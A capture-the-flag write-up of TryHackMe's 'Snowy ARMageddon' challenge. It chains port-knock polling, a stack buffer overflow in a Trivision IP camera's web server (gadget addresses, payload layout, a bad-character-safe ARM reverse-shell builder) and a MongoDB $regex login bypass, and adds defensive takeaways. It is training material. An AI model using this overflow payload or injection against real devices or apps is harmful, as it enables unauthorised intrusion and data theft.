CTF Writeup

Snowy ARMageddon

TryHackMe · AoC 2023 Side Quest · Insane · by 0xb0rn3

Platform:    TryHackMe, Advent of Cyber 2023
Category:    IoT / Binary Exploitation / NoSQL Injection
Difficulty:  Insane
Target:      10.112.147.128
Stack:       ARMv5 IP Camera (Trivision NC-227WF) / PHP 8.1.26 / MongoDB
Flags:       2 flags captured
0 · Context

Overview

An Insane-rated IoT exploitation challenge targeting a Trivision NC-227WF HD IP camera on ARMv5 architecture. The chain: a full nmap sweep that trips the knockd sequence guarding port 23, a stack-based buffer overflow in the camera’s embedded web server exploited with custom ARM shellcode encoded around the bad characters, credential harvesting from the device’s config file, reading the first flag off the live MJPEG camera feed, then NoSQL injection against a MongoDB-backed PHP app for the second key.

ATTACK CHAIN
nmap -p- → ports 22, 8080, 23(filtered), 50628
  ↓
nmap full sweep accidentally triggers knockd → port 23 opens briefly
  ↓
Trivision NC-227WF buffer overflow (port 50628)
  GET /en/login.asp?basic=[A×280][SLEEP][BX_SP][ARM_SHELLCODE]
  ↓
ARMv5 reverse shell → /var/etc/umconfig.txt → admin:Y3tiStarCur!ous
  ↓
Camera MJPEG stream → flag1: THM{YETI_ON_SCREEN_ELUSIVE_CAMERA_STAR}
  ↓
NoSQL injection (port 8080) → username[$regex]=.*
  ↓
yetikey2.txt: 2-K@bWJ5oHFCR8o%whAvK5qw8Sp$5qf!nCqGM3ksaK
1 · Reconnaissance

Port Scan & Camera Fingerprinting

BASH
$ sudo nmap -sV -sC -p- --open -T4 10.112.147.128
Port        Service   Version          Notes
22/tcp      SSH       OpenSSH          Standard
23/tcp      Telnet    -                Filtered — knockd protected
8080/tcp    HTTP      PHP 8.1.26       403 on /login.php (trailing slash bypass)
50628/tcp   HTTP      Trivision webs   IP camera — ARMv5 buffer overflow target

Port 50628 serves the Trivision NC-227WF camera login — an embedded ARMv5 Linux device with a custom webs HTTP server. Port 8080 hosts a PHP/MongoDB app with a 403 bypass via trailing slash.

2 · Port Knock Bypass

nmap Sweep Triggers knockd

Port 23 is protected by knockd: it stays filtered until the configured sequence of ports has been hit in order, then opens for a short window. A full TCP scan (-p-) touches all 65535 ports, so a scan that happens to visit the knock ports in the right order completes the sequence as a side effect. Note that nmap randomizes port order unless -r (sequential, ascending) is given, so whether a given scan hits the sequence in order depends on both the knock sequence and the scan order; polling port 23 while the scan runs is what catches the window.

PYTHON — PORT POLL
import socket
import time

# Run nmap -p- in the background; meanwhile poll port 23 at ~0.3s intervals
TARGET = ("10.112.147.128", 23)
while True:
    s = socket.socket()
    s.settimeout(0.5)
    if s.connect_ex(TARGET) == 0:
        data = s.recv(4096)   # telnet banner with camera creds
        print(data.decode(errors="replace"))
        s.close()
        break
    s.close()
    time.sleep(0.3)

When the port briefly opens, the telnet banner delivers camera credentials from /var/etc/umconfig.txt.

3 · Binary Exploitation

ARMv5 Stack Buffer Overflow

The camera’s webs server has a stack-based buffer overflow in the basic= GET parameter of /en/login.asp. The device runs without ASLR, so library addresses are static, and the stack is executable, so control can be returned straight into shellcode placed at sp.

Arch:       ARMv5TEJ (little-endian)
Vuln:       Stack BOF in basic= parameter (>256 bytes)
PC offset:  284 bytes
Bad chars:  \x00 \x09 \x0a \x0d \x20 \x23 \x26
ASLR:       None — static library addresses

Register   Offset   Value        Meaning
r4         256      -            Padding
r10        280      0x4002EC54   sleep() (libc)
pc         284      0x40010F88   bx sp (libgcc_s)
sp         288      -            Shellcode starts here
BUFFER LAYOUT
[A × 280] [p32(0x4002EC54)] [p32(0x40010F88)] [ARM SHELLCODE]
             sleep() in r10      bx sp → jump to stack

The ARM shellcode implements a reverse TCP shell. Because it travels inside a URL query parameter, none of the bad characters listed above may appear in it, so the IP and port bytes of the sockaddr_in are built up in a register with mov/lsl/add sequences rather than embedded as literal data:

ARM — IP ENCODING (192.168.158.186)
mov  r1, #0xBA       ; 186
lsl  r1, r1, #8
add  r1, r1, #0x9E   ; 158
lsl  r1, r1, #8
add  r1, r1, #0xA8   ; 168
lsl  r1, r1, #8
add  r1, r1, #0xC0   ; 192
str  r1, [sp, #4]    ; store in sockaddr struct
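The encoding above can be generated and checked mechanically. The following Python is an added example, not the writeup's exploit script: it emits the A32 instruction words for mov/add/sub/lsl on r1, builds both sockaddr_in words (family/port and address) the same way the snippet builds the address, and checks every emitted byte against the bad-character list. It goes beyond the page's case in one respect: an octet or port byte that is itself a bad character (0x0a in a 10.x.x.x address, the 0x00 of AF_INET) is produced as the difference of two clean immediates. Pushing with `str r1, [sp, #-4]!` is my choice, since a plain `str r1, [sp]` encodes with a 0x00 byte; `build_payload` reproduces the 280/284/288 stack layout from the table with the two addresses the writeup gives; `simulate` is a self-check over exactly this instruction subset, not an emulator. The socket/connect/dup2/execve part of the shellcode is not on the page and is not included.

```python
import struct

# Bytes the basic= parameter will not carry intact (from the writeup)
BAD = {0x00, 0x09, 0x0a, 0x0d, 0x20, 0x23, 0x26}

# A32 (ARM, little-endian) encodings with r1 as the working register.
# For MOV/ADD/SUB the low byte of the word is the 8-bit immediate (rotation 0).
MOV_R1 = 0xE3A01000   # mov r1, #imm8
ADD_R1 = 0xE2811000   # add r1, r1, #imm8
SUB_R1 = 0xE2411000   # sub r1, r1, #imm8
LSL8   = 0xE1A01401   # mov r1, r1, lsl #8
PUSH   = 0xE52D1004   # str r1, [sp, #-4]!  (push without a 0x00 in the encoding)

def enc(insn: int) -> bytes:
    return struct.pack("<I", insn)

def load_byte(value: int, first: bool) -> bytes:
    """Put `value` into the low byte of r1: MOV when it is the first byte of a
    word, ADD after an LSL #8 otherwise. A value that is itself a bad byte is
    produced as (a - b) with two clean immediates."""
    op = MOV_R1 if first else ADD_R1
    if value not in BAD:
        return enc(op | value)
    for a in range(value + 1, 256):
        b = a - value
        if a not in BAD and b not in BAD:
            return enc(op | a) + enc(SUB_R1 | b)
    raise ValueError(f"cannot encode {value:#x}")

def build_sockaddr_in(ip: str, port: int) -> bytes:
    """Emit code that leaves a sockaddr_in {AF_INET, htons(port), ip} at sp,
    with sin_addr at [sp, #4] as in the writeup's snippet."""
    octets = [int(o) for o in ip.split(".")]
    # Each word is listed most-significant byte first (reverse of memory order).
    addr_word   = octets[::-1]                          # memory: o1 o2 o3 o4
    family_port = [port & 0xFF, port >> 8, 0x00, 0x02]  # memory: 02 00 hi lo
    code = b""
    for word in (addr_word, family_port):               # push sin_addr first
        code += load_byte(word[0], first=True)
        for byte in word[1:]:
            code += enc(LSL8) + load_byte(byte, first=False)
        code += enc(PUSH)
    return code

def bad_bytes(blob: bytes) -> set:
    return set(blob) & BAD

def simulate(code: bytes) -> bytes:
    """Interpret the handful of encodings above and return the bytes the code
    leaves on the stack, lowest address first (a self-check, not an emulator)."""
    r1, stack = 0, b""
    for (insn,) in struct.iter_unpack("<I", code):
        op, imm = insn & 0xFFFFFF00, insn & 0xFF
        if insn == LSL8:
            r1 = (r1 << 8) & 0xFFFFFFFF
        elif insn == PUSH:
            stack = struct.pack("<I", r1) + stack
        elif op == MOV_R1:
            r1 = imm
        elif op == ADD_R1:
            r1 = (r1 + imm) & 0xFFFFFFFF
        elif op == SUB_R1:
            r1 = (r1 - imm) & 0xFFFFFFFF
        else:
            raise ValueError(f"unexpected instruction {insn:#010x}")
    return stack

def build_payload(shellcode: bytes) -> bytes:
    """Stack layout from the writeup: 280 bytes of padding, sleep() into r10,
    the bx sp gadget into pc, then the shellcode that bx sp lands on."""
    payload = (b"A" * 280
               + struct.pack("<I", 0x4002EC54)   # sleep() in libc
               + struct.pack("<I", 0x40010F88)   # bx sp in libgcc_s
               + shellcode)
    found = bad_bytes(payload)
    if found:
        raise ValueError(f"payload contains bad bytes: {sorted(found)}")
    return payload

if __name__ == "__main__":
    code = build_sockaddr_in("192.168.158.186", 4444)
    print(simulate(code).hex())   # 0200115cc0a89eba
    print(len(build_payload(code)), "byte payload, no bad bytes")
```

The first instruction emitted for 192.168.158.186 is `mov r1, #0xBA` (bytes BA 10 A0 E3), matching the snippet above; the resulting stack image is 02 00 11 5C followed by C0 A8 9E BA, which is AF_INET, port 4444 in network order, and the address in network order.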
REVERSE SHELL
$ nc -lvnp 4444
Connection from 10.112.147.128

# cat /proc/cpuinfo | grep "CPU architecture"
CPU architecture: 5TEJ   (ARMv5)

# cat /var/etc/umconfig.txt
name=admin
password=Y3tiStarCur!ous
4 · Flag 1

Camera MJPEG Stream → Visual Flag

Login to the camera web interface at http://10.112.147.128:50628/en/login.asp with admin:Y3tiStarCur!ous. Navigate to the live MJPEG stream at /en/player/mjpeg_vga.asp — the camera is pointed at a display showing the flag:

Flag 1
THM{YETI_ON_SCREEN_ELUSIVE_CAMERA_STAR}
5 · NoSQL Injection

MongoDB Auth Bypass → yetikey2.txt

Port 8080 serves a PHP/MongoDB login form. Direct access to /login.php returns 403, bypassed with a trailing slash: /login.php/. The access rule typically matches the exact path, while the PHP handler still resolves /login.php/ to the same script (the trailing part becomes PATH_INFO).

PYTHON — NoSQL INJECTION
import requests

s = requests.Session()
# PHP turns username[$regex] into an array, which the app passes to MongoDB as an operator
r = s.post("http://10.112.147.128:8080/login.php/",
           data={
               "username[$regex]": ".*",
               "password[$regex]": ".*"
           },
           allow_redirects=False)
print(r.status_code)   # 302 redirect: authenticated

$ curl -b "PHPSESSID=<session>" http://10.112.147.128:8080/yetikey2.txt
2-K@bWJ5oHFCR8o%whAvK5qw8Sp$5qf!nCqGM3ksaK
yetikey2.txt
2-K@bWJ5oHFCR8o%whAvK5qw8Sp$5qf!nCqGM3ksaK
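Why `username[$regex]` works, shown as an added example rather than the challenge's PHP source, which is not on the page: PHP's request parsing turns a bracketed key into an array, so the filter handed to MongoDB becomes {'username': {'$regex': '.*'}}, and a regex that matches everything satisfies the lookup for every document. The Python below models that parsing and the two operators involved over a constructed user record; `vulnerable_login` passes the values through as the app on port 8080 evidently does, and `hardened_login` applies the strict string check recommended in the Takeaways. The user record and request bodies are constructed for the example.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample user collection (stand-in for the MongoDB users collection)
USERS = [{"username": "santa", "password": "s3cret"}]

def parse_php_post(body: str) -> dict:
    """Model of how PHP populates $_POST: a key written as name[sub] becomes a
    nested array, so username[$regex]=.* arrives as {'username': {'$regex': '.*'}}."""
    post = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = re.fullmatch(r"([^\[\]]+)\[([^\[\]]*)\]", key)
        if m:
            post.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            post[key] = value
    return post

def field_matches(stored: str, cond) -> bool:
    """Evaluate one filter value against a stored field: a plain string is an
    equality test, an operator object is applied the way MongoDB applies it."""
    if cond is None:
        return False
    if isinstance(cond, str):
        return stored == cond
    if "$regex" in cond:
        return re.search(cond["$regex"], stored) is not None
    if "$ne" in cond:
        return stored != cond["$ne"]
    return False

def find_one(filt: dict):
    """Minimal stand-in for collection.find_one(filt)."""
    for doc in USERS:
        if all(field_matches(doc[k], v) for k, v in filt.items()):
            return doc
    return None

def vulnerable_login(body: str):
    """Passes $_POST values straight into the filter: the pattern behind the bypass."""
    post = parse_php_post(body)
    user = find_one({"username": post.get("username"),
                     "password": post.get("password")})
    return user["username"] if user else None

def hardened_login(body: str):
    """Rejects anything that is not a plain string before it reaches the query,
    so operator objects such as {'$regex': '.*'} or {'$ne': ''} never get in."""
    post = parse_php_post(body)
    username, password = post.get("username"), post.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        return None
    user = find_one({"username": username, "password": password})
    return user["username"] if user else None
```

`vulnerable_login("username[$regex]=.*&password[$regex]=.*")` returns the first user without knowing either value, and `password[$ne]=x` does the same; `hardened_login` returns None for both and only succeeds with the real credentials. In PHP the equivalent check is rejecting arrays (or casting with `(string)`) before building the filter.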
Visualization

Attack Chain

1 · Port Knock via nmap Sweep
nmap -p- triggers knockd sequence → port 23 opens → camera credentials
2 · ARMv5 Stack Buffer Overflow
basic= parameter → ROP: sleep() + bx sp → ARM reverse shell
3 · Camera Credential Harvest
/var/etc/umconfig.txt → admin:Y3tiStarCur!ous
4 · MJPEG Stream → Flag 1
Live camera feed shows flag → THM{YETI_ON_SCREEN_ELUSIVE_CAMERA_STAR}
5 · NoSQL Injection → yetikey2
$regex: .* auth bypass → 2-K@bWJ5oHFCR8o%whAvK5qw8Sp$5qf!nCqGM3ksaK
Assessment

Vulnerabilities

Finding                             Location                            Severity   Impact
Stack buffer overflow (no ASLR)     Camera webs server, basic= param    Critical   Remote code execution, root shell on IoT device
NoSQL injection ($regex)            Port 8080 /login.php                Critical   Authentication bypass, arbitrary data access
Plaintext credentials in firmware   /var/etc/umconfig.txt               High       Camera admin password in cleartext
403 bypass via trailing slash       Port 8080 nginx/Apache              High       Access restriction completely bypassed
Port knock sequence discoverable    knockd config                       Medium     Full port scan triggers knock sequence in order
Defense

Takeaways

IoT Devices Need ASLR
Static library addresses make the sleep() + bx sp chain reliable on every run, and an executable stack lets it land directly in shellcode. Embedded Linux builds must enable ASLR and PIE, and mark the stack non-executable, to raise the exploitation bar.
Sanitize MongoDB Queries
PHP turns bracketed form keys into arrays, so username[$regex] reaches the query as an operator object; when $regex or $ne pass through unfiltered, any find() query can be satisfied without knowing a value. Reject non-string input (or cast to string) before building the filter.
ARM Bad Char Encoding
Encode IP/port bytes using mov/lsl/add arithmetic sequences instead of embedding raw bytes. Avoids null, space, and other bad characters in shellcode.
Port Knocking Is Not Security
Knock sequences triggered by sequential port scans provide zero protection. Use proper authentication instead of security through obscurity.
Arsenal

Tools Used

Tool                        Purpose
nmap                        Port scanning, service enum, accidental port knock trigger
pwntools                    Cyclic pattern, offset calculation, payload construction
custom ARM shellcode        ARMv5 reverse TCP shell with bad char avoidance
netcat                      Reverse shell listener
python3 + requests          NoSQL injection, port polling, exploit delivery
snowy_armageddon_auto.py    Full automated exploit chain